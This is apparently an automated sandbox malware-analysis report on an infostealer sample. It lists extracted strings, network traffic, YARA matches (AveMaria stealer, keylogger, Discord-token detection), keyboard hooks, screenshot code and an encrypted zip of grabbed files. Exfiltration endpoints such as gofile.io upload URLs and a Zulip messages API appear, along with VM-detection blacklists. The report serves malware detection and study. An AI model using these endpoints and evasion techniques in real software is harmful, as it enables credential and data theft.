                          Source: tmpEFE0.tmp.dat.1.dr, tmp555.tmp.dat.1.drString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                          Source: tmpEFE0.tmp.dat.1.dr, tmp555.tmp.dat.1.drString found in binary or memory: https://duckduckgo.com/ac/?q=
                          Source: tmpEFE0.tmp.dat.1.dr, tmp555.tmp.dat.1.drString found in binary or memory: https://duckduckgo.com/chrome_newtab
                          Source: tmpEFE0.tmp.dat.1.dr, tmp555.tmp.dat.1.drString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                          Source: JOUNLV.exe, 00000001.00000002.2024186074.000001BB50B90000.00000004.08000000.00040000.00000000.sdmp, JOUNLV.exe, 00000001.00000002.2018670579.000001BB47E93000.00000004.00000800.00020000.00000000.sdmp, JOUNLV.exe, 00000001.00000002.2018670579.000001BB4805A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/JamesNK/Newtonsoft.Json
                          Source: JOUNLV.exe, 00000001.00000002.2023716769.000001BB50AE0000.00000004.08000000.00040000.00000000.sdmp, JOUNLV.exe, 00000001.00000002.2018670579.000001BB481CB000.00000004.00000800.00020000.00000000.sdmp, JOUNLV.exe, 00000001.00000002.2015535093.000001BB37FA4000.00000004.00000800.00020000.00000000.sdmp, JOUNLV.exe, 00000001.00000002.2018670579.000001BB47E93000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/dotnet/runtime
                          Source: JOUNLV.exe, 00000001.00000002.2023716769.000001BB50AE0000.00000004.08000000.00040000.00000000.sdmp, JOUNLV.exe, 00000001.00000002.2018670579.000001BB481CB000.00000004.00000800.00020000.00000000.sdmp, JOUNLV.exe, 00000001.00000002.2015535093.000001BB37FA4000.00000004.00000800.00020000.00000000.sdmp, JOUNLV.exe, 00000001.00000002.2018670579.000001BB47E93000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/dotnet/runtime8
                          Source: JOUNLV.exe, 00000001.00000002.2015535093.000001BB38567000.00000004.00000800.00020000.00000000.sdmp, JOUNLV.exe, 00000001.00000002.2015451084.000001BB37DC0000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: https://github.com/icsharpcode/SharpZipLib
                          Source: JOUNLV.exe.0.drString found in binary or memory: https://github.com/kgnfth
                          Source: JOUNLV.exe, 00000001.00000002.2015535093.000001BB37FA4000.00000004.00000800.00020000.00000000.sdmp, JOUNLV.exe, 00000001.00000002.2015535093.000001BB37E73000.00000004.00000800.00020000.00000000.sdmp, JOUNLV.exe, 00000001.00000002.2015535093.000001BB37ECD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://gofile.io/d/liMaKC
                          Source: JOUNLV.exe, 00000001.00000002.2015535093.000001BB381CC000.00000004.00000800.00020000.00000000.sdmp, JOUNLV.exe, 00000001.00000002.2015535093.000001BB37EC9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://gofile.io/d/liMaKC)
                          Source: LKxcbzlwkz.exe, 00000000.00000002.3000322888.0000000000BC4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ip-score.com/
                          Source: LKxcbzlwkz.exe, 00000000.00000003.2062832927.0000000000BE9000.00000004.00000020.00020000.00000000.sdmp, LKxcbzlwkz.exe, 00000000.00000002.3000322888.0000000000BD8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ip-score.com/checkip/
                          Source: LKxcbzlwkz.exe, 00000000.00000002.3000653293.0000000000BF0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ip-score.com/checkip/2
                          Source: LKxcbzlwkz.exe, 00000000.00000002.3000653293.0000000000BF0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ip-score.com/checkip/65
                          Source: LKxcbzlwkz.exe, 00000000.00000002.3000322888.0000000000B3B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ip-score.com/checkip/C:
                          Source: LKxcbzlwkz.exe, 00000000.00000002.3000322888.0000000000BC4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ip-score.com/checkip/HC:
                          Source: LKxcbzlwkz.exe, 00000000.00000002.3000653293.0000000000BF0000.00000004.00000020.00020000.00000000.sdmp, LKxcbzlwkz.exe, 00000000.00000003.2062832927.0000000000BF0000.00000004.00000020.00020000.00000000.sdmp, LKxcbzlwkz.exe, 00000000.00000003.2063068490.0000000000BF0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ip-score.com/checkip/LMEM
                          Source: LKxcbzlwkz.exe, 00000000.00000002.3000322888.0000000000BA4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ip-score.com/checkip/O
                          Source: LKxcbzlwkz.exe, 00000000.00000002.3000322888.0000000000B3B000.00000004.00000020.00020000.00000000.sdmp, LKxcbzlwkz.exe, 00000000.00000002.3000322888.0000000000BC4000.00000004.00000020.00020000.00000000.sdmp, LKxcbzlwkz.exe, 00000000.00000003.2062832927.0000000000BE9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ip-score.com/checkip/TTC:
                          Source: LKxcbzlwkz.exe, 00000000.00000002.3000653293.0000000000BF0000.00000004.00000020.00020000.00000000.sdmp, LKxcbzlwkz.exe, 00000000.00000003.2062832927.0000000000BF0000.00000004.00000020.00020000.00000000.sdmp, LKxcbzlwkz.exe, 00000000.00000003.2063068490.0000000000BF0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ip-score.com/checkip/erse
                          Source: LKxcbzlwkz.exe, 00000000.00000002.3000322888.0000000000BC4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ip-score.com/ows
                          Source: JOUNLV.exe, 00000001.00000002.2015535093.000001BB37E21000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://raw.githubusercontent.com
                          Source: LKxcbzlwkz.exe, 00000000.00000003.1760441440.0000000004028000.00000004.00000020.00020000.00000000.sdmp, aut66E4.tmp.0.dr, JOUNLV.exe.0.drString found in binary or memory: https://raw.githubusercontent.com/6nz/virustotal-vm-blacklist/main/
                          Source: LKxcbzlwkz.exe, 00000000.00000003.1760441440.0000000004028000.00000004.00000020.00020000.00000000.sdmp, JOUNLV.exe, 00000001.00000002.2015535093.000001BB37E21000.00000004.00000800.00020000.00000000.sdmp, aut66E4.tmp.0.dr, JOUNLV.exe.0.drString found in binary or memory: https://raw.githubusercontent.com/6nz/virustotal-vm-blacklist/main/MachineGuid.txt
                          Source: LKxcbzlwkz.exe, 00000000.00000003.1760441440.0000000004028000.00000004.00000020.00020000.00000000.sdmp, JOUNLV.exe, 00000001.00000002.2015535093.000001BB37E21000.00000004.00000800.00020000.00000000.sdmp, aut66E4.tmp.0.dr, JOUNLV.exe.0.drString found in binary or memory: https://raw.githubusercontent.com/6nz/virustotal-vm-blacklist/main/gpu_list.txt
                          Source: LKxcbzlwkz.exe, 00000000.00000003.1760441440.0000000004028000.00000004.00000020.00020000.00000000.sdmp, JOUNLV.exe, 00000001.00000002.2015535093.000001BB37E21000.00000004.00000800.00020000.00000000.sdmp, aut66E4.tmp.0.dr, JOUNLV.exe.0.drString found in binary or memory: https://raw.githubusercontent.com/6nz/virustotal-vm-blacklist/main/ip_list.txt
                          Source: LKxcbzlwkz.exe, 00000000.00000003.1760441440.0000000004028000.00000004.00000020.00020000.00000000.sdmp, JOUNLV.exe, 00000001.00000002.2015535093.000001BB37E21000.00000004.00000800.00020000.00000000.sdmp, aut66E4.tmp.0.dr, JOUNLV.exe.0.drString found in binary or memory: https://raw.githubusercontent.com/6nz/virustotal-vm-blacklist/main/pc_name_list.txt
                          Source: LKxcbzlwkz.exe, 00000000.00000003.1760441440.0000000004028000.00000004.00000020.00020000.00000000.sdmp, JOUNLV.exe, 00000001.00000002.2015535093.000001BB37E21000.00000004.00000800.00020000.00000000.sdmp, aut66E4.tmp.0.dr, JOUNLV.exe.0.drString found in binary or memory: https://raw.githubusercontent.com/6nz/virustotal-vm-blacklist/main/pc_username_list.txt
                          Source: LKxcbzlwkz.exe, 00000000.00000003.1760441440.0000000004028000.00000004.00000020.00020000.00000000.sdmp, JOUNLV.exe, 00000001.00000002.2015535093.000001BB37E21000.00000004.00000800.00020000.00000000.sdmp, aut66E4.tmp.0.dr, JOUNLV.exe.0.drString found in binary or memory: https://raw.githubusercontent.com/6nz/virustotal-vm-blacklist/main/processes_list.txt
                          Source: JOUNLV.exe, 00000001.00000002.2024985170.000001BB50D65000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://raw.githubusercontent.com/icsharpcode/SharpZipLib/33f64eb0f28cdd2b084cb822fcc224c7c5aba553/
                          Source: JOUNLV.exe, 00000001.00000002.2015535093.000001BB37FA4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://store6.gofile.io
                          Source: JOUNLV.exe, 00000001.00000002.2015535093.000001BB37FA4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://store6.gofile.io/X
                          Source: JOUNLV.exe, 00000001.00000002.2015535093.000001BB37FA4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://store6.gofile.io/uploadfile
                          Source: tmp42BD.tmp.dat.1.drString found in binary or memory: https://support.mozilla.org
                          Source: tmp42BD.tmp.dat.1.drString found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
                          Source: tmp42BD.tmp.dat.1.drString found in binary or memory: https://support.mozilla.org/products/firefoxgro.allizom.troppus.zvXrErQ5GYDF
                          Source: tmpF011.tmp.dat.1.dr, tmpF031.tmp.dat.1.drString found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016
                          Source: tmpF011.tmp.dat.1.dr, tmpF031.tmp.dat.1.drString found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples
                          Source: tmpF011.tmp.dat.1.dr, tmpF031.tmp.dat.1.drString found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17
                          Source: tmpF011.tmp.dat.1.dr, tmpF031.tmp.dat.1.drString found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install
                          Source: JOUNLV.exe, 00000001.00000002.2015535093.000001BB37FA4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://szurubooru.zulipchat.com
                          Source: JOUNLV.exe, 00000001.00000002.2015535093.000001BB37EFD000.00000004.00000800.00020000.00000000.sdmp, JOUNLV.exe, 00000001.00000002.2015535093.000001BB381D7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://szurubooru.zulipchat.com/api/v1/messages
                          Source: tmpEFE0.tmp.dat.1.dr, tmp555.tmp.dat.1.drString found in binary or memory: https://www.ecosia.org/newtab/
                          Source: tmpEFE0.tmp.dat.1.dr, tmp555.tmp.dat.1.drString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                          Source: tmp42BD.tmp.dat.1.drString found in binary or memory: https://www.mozilla.org
                          Source: tmp42BD.tmp.dat.1.drString found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.VsJpOAWrHqB2
                          Source: tmp42BD.tmp.dat.1.drString found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.n0g9CLHwD9nR
                          Source: History.txt0.1.drString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/
                          Source: tmpDCFB.tmp.dat.1.dr, tmp42BD.tmp.dat.1.drString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
                          Source: tmp42BD.tmp.dat.1.drString found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
                          Source: tmpDCFB.tmp.dat.1.dr, tmp42BD.tmp.dat.1.drString found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
                          Source: JOUNLV.exe, 00000001.00000002.2024186074.000001BB50B90000.00000004.08000000.00040000.00000000.sdmp, JOUNLV.exe, 00000001.00000002.2018670579.000001BB47E93000.00000004.00000800.00020000.00000000.sdmp, JOUNLV.exe, 00000001.00000002.2018670579.000001BB4805A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.newtonsoft.com/json
                          Source: JOUNLV.exe, 00000001.00000002.2018670579.000001BB4805A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.newtonsoft.com/jsonschema
                          Source: JOUNLV.exe, 00000001.00000002.2024186074.000001BB50B90000.00000004.08000000.00040000.00000000.sdmp, JOUNLV.exe, 00000001.00000002.2018670579.000001BB47E93000.00000004.00000800.00020000.00000000.sdmp, JOUNLV.exe, 00000001.00000002.2018670579.000001BB4805A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.nuget.org/packages/Newtonsoft.Json.Bson
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49743
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49742
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49748 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49743 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49751 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49739
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49738
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49737
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49736 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49736
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49735
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49738 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49734
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49733
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49734 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49732
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49751
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49742 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49748
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49735 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49737 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 443
                          Source: unknownHTTPS traffic detected: 185.199.110.133:443 -> 192.168.2.4:49735 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 185.199.110.133:443 -> 192.168.2.4:49733 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 185.199.110.133:443 -> 192.168.2.4:49737 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 185.199.110.133:443 -> 192.168.2.4:49732 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 185.199.110.133:443 -> 192.168.2.4:49736 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 185.199.110.133:443 -> 192.168.2.4:49734 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 188.138.68.212:443 -> 192.168.2.4:49738 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49739 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 45.112.123.126:443 -> 192.168.2.4:49742 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 31.14.70.249:443 -> 192.168.2.4:49743 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 50.17.0.11:443 -> 192.168.2.4:49751 version: TLS 1.2

                          Key, Mouse, Clipboard, Microphone and Screen Capturing

                          barindex
                          Yara detected Keylogger Generic
                          Source: Yara matchFile source: Process Memory Space: LKxcbzlwkz.exe PID: 4924, type: MEMORYSTR
                          Contains functionality to capture screen (.Net source)
                          Source: JOUNLV.exe.0.dr, DesktopScreenshot.cs.Net Code: Make
                          Source: aut66E4.tmp.0.dr, DesktopScreenshot.cs.Net Code: Make
                          Contains functionality to log keystrokes (.Net Source)
                          Source: JOUNLV.exe.0.dr, Keylogger.cs.Net Code: SetHook
                          Source: JOUNLV.exe.0.dr, Keylogger.cs.Net Code: KeyboardLayout
                          Source: aut66E4.tmp.0.dr, Keylogger.cs.Net Code: SetHook
                          Source: aut66E4.tmp.0.dr, Keylogger.cs.Net Code: KeyboardLayout
                          Installs a global keyboard hook
                          Source: C:\Users\user\Desktop\LKxcbzlwkz.exeWindows user hook set: 0 keyboard low level C:\Users\user\Desktop\LKxcbzlwkz.exeJump to behavior
                          Source: C:\Users\user\Desktop\LKxcbzlwkz.exeWindows user hook set: 0 keyboard low level C:\Users\user\Desktop\LKxcbzlwkz.exeJump to behavior
                          Source: C:\Users\user\Desktop\LKxcbzlwkz.exeWindows user hook set: 0 keyboard low level C:\Users\user\Desktop\LKxcbzlwkz.exeJump to behavior
                          Source: C:\Users\user\Desktop\LKxcbzlwkz.exeWindows user hook set: 0 keyboard low level C:\Users\user\Desktop\LKxcbzlwkz.exeJump to behavior
                          Source: C:\Users\user\Desktop\LKxcbzlwkz.exeWindows user hook set: 0 keyboard low level C:\Users\user\Desktop\LKxcbzlwkz.exeJump to behavior
                          Source: C:\Users\user\Desktop\LKxcbzlwkz.exeWindows user hook set: 0 keyboard low level C:\Users\user\Desktop\LKxcbzlwkz.exeJump to behavior
                          Source: C:\Users\user\Desktop\LKxcbzlwkz.exeCode function: 0_2_0045A10F OpenClipboard,EmptyClipboard,CloseClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,0_2_0045A10F
                          Source: C:\Users\user\Desktop\LKxcbzlwkz.exeCode function: 0_2_0045A10F OpenClipboard,EmptyClipboard,CloseClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,0_2_0045A10F
                          Source: C:\Users\user\Desktop\LKxcbzlwkz.exeCode function: 0_2_0046DC80 OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,0_2_0046DC80
                          Source: C:\Users\user\Desktop\LKxcbzlwkz.exeCode function: 0_2_0044C37A GetKeyboardState,SetKeyboardState,PostMessageW,PostMessageW,SendInput,0_2_0044C37A
                          Source: C:\Users\user\AppData\Local\Temp\JOUNLV.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                          Source: C:\Users\user\Desktop\LKxcbzlwkz.exeCode function: 0_2_0047C81C SendMessageW,DefDlgProcW,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,GetWindowLongW,SendMessageW,SendMessageW,SendMessageW,_wcsncpy,SendMessageW,SendMessageW,SendMessageW,InvalidateRect,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,0_2_0047C81C

                          E-Banking Fraud

                          barindex
                          Yara detected AveMaria stealer
                          Source: Yara matchFile source: Process Memory Space: LKxcbzlwkz.exe PID: 4924, type: MEMORYSTR

                          Spam, unwanted Advertisements and Ransom Demands

                          barindex
                          Modifies existing user documents (likely ransomware behavior)
                          Source: C:\Users\user\AppData\Local\Temp\JOUNLV.exeFile deleted: C:\Users\user\AppData\Local\cb60c5e88147715fe2ed1a9bb45bba55\user@724536_en-CH\Grabber\DRIVE-C\Users\user\Desktop\YPSIACHYXW.docxJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\JOUNLV.exeFile deleted: C:\Users\user\AppData\Local\cb60c5e88147715fe2ed1a9bb45bba55\user@724536_en-CH\Grabber\DRIVE-C\Users\user\Desktop\YPSIACHYXW.docxJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\JOUNLV.exeFile deleted: C:\Users\user\AppData\Local\cb60c5e88147715fe2ed1a9bb45bba55\user@724536_en-CH\Grabber\DRIVE-C\Users\user\Desktop\NIKHQAIQAU.pdfJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\JOUNLV.exeFile deleted: C:\Users\user\AppData\Local\cb60c5e88147715fe2ed1a9bb45bba55\user@724536_en-CH\Grabber\DRIVE-C\Users\user\Desktop\NIKHQAIQAU.pdfJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\JOUNLV.exeFile deleted: C:\Users\user\AppData\Local\cb60c5e88147715fe2ed1a9bb45bba55\user@724536_en-CH\Grabber\DRIVE-C\Users\user\Desktop\WUTJSCBCFX.docxJump to behavior

                          System Summary

                          barindex
                          Malicious sample detected (through community Yara rule)
                          Source: 1.0.JOUNLV.exe.1bb35cc0000.0.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Discord tokens regular expressions Author: ditekSHen
                          Source: 00000000.00000003.1760441440.0000000004028000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects executables referencing Discord tokens regular expressions Author: ditekSHen
                          Source: 00000001.00000002.2015535093.000001BB37EFD000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects executables referencing Discord tokens regular expressions Author: ditekSHen
                          Source: 00000001.00000000.1763580624.000001BB35CC2000.00000002.00000001.01000000.00000006.sdmp, type: MEMORYMatched rule: Detects executables referencing Discord tokens regular expressions Author: ditekSHen
                          Source: Process Memory Space: LKxcbzlwkz.exe PID: 4924, type: MEMORYSTRMatched rule: Detects executables referencing Discord tokens regular expressions Author: ditekSHen
                          Source: Process Memory Space: JOUNLV.exe PID: 4828, type: MEMORYSTRMatched rule: Detects executables referencing Discord tokens regular expressions Author: ditekSHen
                          Source: C:\Users\user\AppData\Local\Temp\aut66E4.tmp, type: DROPPEDMatched rule: Detects executables referencing Discord tokens regular expressions Author: ditekSHen
                          Source: C:\Users\user\AppData\Local\Temp\JOUNLV.exe, type: DROPPEDMatched rule: Detects executables referencing Discord tokens regular expressions Author: ditekSHen
                          Drops password protected ZIP file
                          Source: user@724536_en-CH.zip.1.drZip Entry: encrypted
                          Source: user@724536_en-CH.zip.1.drZip Entry: encrypted
                          Source: user@724536_en-CH.zip.1.drZip Entry: encrypted
                          Source: user@724536_en-CH.zip.1.drZip Entry: encrypted
                          Source: user@724536_en-CH.zip.1.drZip Entry: encrypted
                          Source: user@724536_en-CH.zip.1.drZip Entry: encrypted
                          Source: user@724536_en-CH.zip.1.drZip Entry: encrypted
                          Source: user@724536_en-CH.zip.1.drZip Entry: encrypted
                          Source: user@724536_en-CH.zip.1.drZip Entry: encrypted
                          Source: user@724536_en-CH.zip.1.drZip Entry: encrypted
                          Source: user@724536_en-CH.zip.1.drZip Entry: encrypted
                          Source: user@724536_en-CH.zip.1.drZip Entry: encrypted
                          Source: user@724536_en-CH.zip.1.drZip Entry: encrypted
                          Source: user@724536_en-CH.zip.1.drZip Entry: encrypted
                          Source: user@724536_en-CH.zip.1.drZip Entry: encrypted
                          Source: user@724536_en-CH.zip.1.drZip Entry: encrypted
                          Source: user@724536_en-CH.zip.1.drZip Entry: encrypted
                          Source: user@724536_en-CH.zip.1.drZip Entry: encrypted
                          Source: user@724536_en-CH.zip.1.drZip Entry: encrypted
                          Source: user@724536_en-CH.zip.1.drZip Entry: encrypted
                          Source: user@724536_en-CH.zip.1.drZip Entry: encrypted
                          Source: user@724536_en-CH.zip.1.drZip Entry: encrypted
                          Source: user@724536_en-CH.zip.1.drZip Entry: encrypted
                          Source: user@724536_en-CH.zip.1.drZip Entry: encrypted
                          Source: user@724536_en-CH.zip.1.drZip Entry: encrypted
                          Source: user@724536_en-CH.zip.1.drZip Entry: encrypted
                          Source: user@724536_en-CH.zip.1.drZip Entry: encrypted
                          Source: user@724536_en-CH.zip.1.drZip Entry: encrypted
                          Source: user@724536_en-CH.zip.1.drZip Entry: encrypted
                          Source: user@724536_en-CH.zip.1.drZip Entry: encrypted
                          Source: user@724536_en-CH.zip.1.drZip Entry: encrypted
                          Source: user@724536_en-CH.zip.1.drZip Entry: encrypted
                          Source: user@724536_en-CH.zip.1.drZip Entry: encrypted
                          Source: user@724536_en-CH.zip.1.drZip Entry: encrypted
                          Source: user@724536_en-CH.zip.1.drZip Entry: encrypted
                          Source: user@724536_en-CH.zip.1.drZip Entry: encrypted
                          Source: user@724536_en-CH.zip.1.drZip Entry: encrypted
                          Source: user@724536_en-CH.zip.1.drZip Entry: encrypted
                          Source: user@724536_en-CH.zip.1.drZip Entry: encrypted
                          Source: user@724536_en-CH.zip.1.drZip Entry: encrypted
                          Source: user@724536_en-CH.zip.1.drZip Entry: encrypted
                          Source: user@724536_en-CH.zip.1.drZip Entry: encrypted
                          Source: user@724536_en-CH.zip.1.drZip Entry: encrypted
                          Source: user@724536_en-CH.zip.1.drZip Entry: encrypted
                          Source: user@724536_en-CH.zip.1.drZip Entry: encrypted
                          Source: user@724536_en-CH.zip.1.drZip Entry: encrypted
                          Source: user@724536_en-CH.zip.1.drZip Entry: encrypted
                          Source: user@724536_en-CH.zip.1.drZip Entry: encrypted
                          Source: user@724536_en-CH.zip.1.drZip Entry: encrypted
                          Source: user@724536_en-CH.zip.1.drZip Entry: encrypted
                          Source: user@724536_en-CH.zip.1.drZip Entry: encrypted
                          Source: user@724536_en-CH.zip.1.drZip Entry: encrypted
                          Source: user@724536_en-CH.zip.1.drZip Entry: encrypted
                          Source: user@724536_en-CH.zip.1.drZip Entry: encrypted
                          Source: user@724536_en-CH.zip.1.drZip Entry: encrypted
                          Source: user@724536_en-CH.zip.1.drZip Entry: encrypted
                          Source: user@724536_en-CH.zip.1.drZip Entry: encrypted
                          Source: user@724536_en-CH.zip.1.drZip Entry: encrypted
                          Source: user@724536_en-CH.zip.1.drZip Entry: encrypted
                          Source: user@724536_en-CH.zip.1.drZip Entry: encrypted
                          Source: user@724536_en-CH.zip.1.drZip Entry: encrypted
                          Source: user@724536_en-CH.zip.1.drZip Entry: encrypted
                          Source: user@724536_en-CH.zip.1.drZip Entry: encrypted
                          Source: user@724536_en-CH.zip.1.drZip Entry: encrypted
                          Source: user@724536_en-CH.zip.1.drZip Entry: encrypted
                          Source: user@724536_en-CH.zip.1.drZip Entry: encrypted
                          Source: user@724536_en-CH.zip.1.drZip Entry: encrypted
                          Source: user@724536_en-CH.zip.1.drZip Entry: encrypted
                          Source: user@724536_en-CH.zip.1.drZip Entry: encrypted
                          Source: user@724536_en-CH.zip.1.drZip Entry: encrypted
                          Source: C:\Users\user\Desktop\LKxcbzlwkz.exeCode function: 0_2_00431BE8: GetFullPathNameW,__swprintf,_wcslen,CreateDirectoryW,CreateFileW,_wcsncpy,DeviceIoControl,CloseHandle,RemoveDirectoryW,CloseHandle,0_2_00431BE8
                          Source: C:\Users\user\Desktop\LKxcbzlwkz.exeCode function: 0_2_00446313 DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,_wcsncpy,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,0_2_00446313
                          Source: C:\Users\user\Desktop\LKxcbzlwkz.exeCode function: 0_2_004333BE GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,SetSystemPowerState,0_2_004333BE
                          Source: C:\Users\user\Desktop\LKxcbzlwkz.exeCode function: 0_2_004096A00_2_004096A0
                          Source: C:\Users\user\Desktop\LKxcbzlwkz.exeCode function: 0_2_0042200C0_2_0042200C
                          Source: C:\Users\user\Desktop\LKxcbzlwkz.exeCode function: 0_2_0041A2170_2_0041A217
                          Source: C:\Users\user\Desktop\LKxcbzlwkz.exeCode function: 0_2_004122160_2_00412216
                          Source: C:\Users\user\Desktop\LKxcbzlwkz.exeCode function: 0_2_0042435D0_2_0042435D
                          Source: C:\Users\user\Desktop\LKxcbzlwkz.exeCode function: 0_2_004033C00_2_004033C0
                          Source: C:\Users\user\Desktop\LKxcbzlwkz.exeCode function: 0_2_0044F4300_2_0044F430
                          Source: C:\Users\user\Desktop\LKxcbzlwkz.exeCode function: 0_2_004125E80_2_004125E8
                          Source: C:\Users\user\Desktop\LKxcbzlwkz.exeCode function: 0_2_0044663B0_2_0044663B
                          Source: C:\Users\user\Desktop\LKxcbzlwkz.exeCode function: 0_2_004138010_2_00413801
                          Source: C:\Users\user\Desktop\LKxcbzlwkz.exeCode function: 0_2_0042096F0_2_0042096F
                          Source: C:\Users\user\Desktop\LKxcbzlwkz.exeCode function: 0_2_004129D00_2_004129D0
                          Source: C:\Users\user\Desktop\LKxcbzlwkz.exeCode function: 0_2_004119E30_2_004119E3
                          Source: C:\Users\user\Desktop\LKxcbzlwkz.exeCode function: 0_2_0041C9AE0_2_0041C9AE
                          Source: C:\Users\user\Desktop\LKxcbzlwkz.exeCode function: 0_2_0047EA6F0_2_0047EA6F
                          Source: C:\Users\user\Desktop\LKxcbzlwkz.exeCode function: 0_2_0040FA100_2_0040FA10
                          Source: C:\Users\user\Desktop\LKxcbzlwkz.exeCode function: 0_2_0044EB590_2_0044EB59
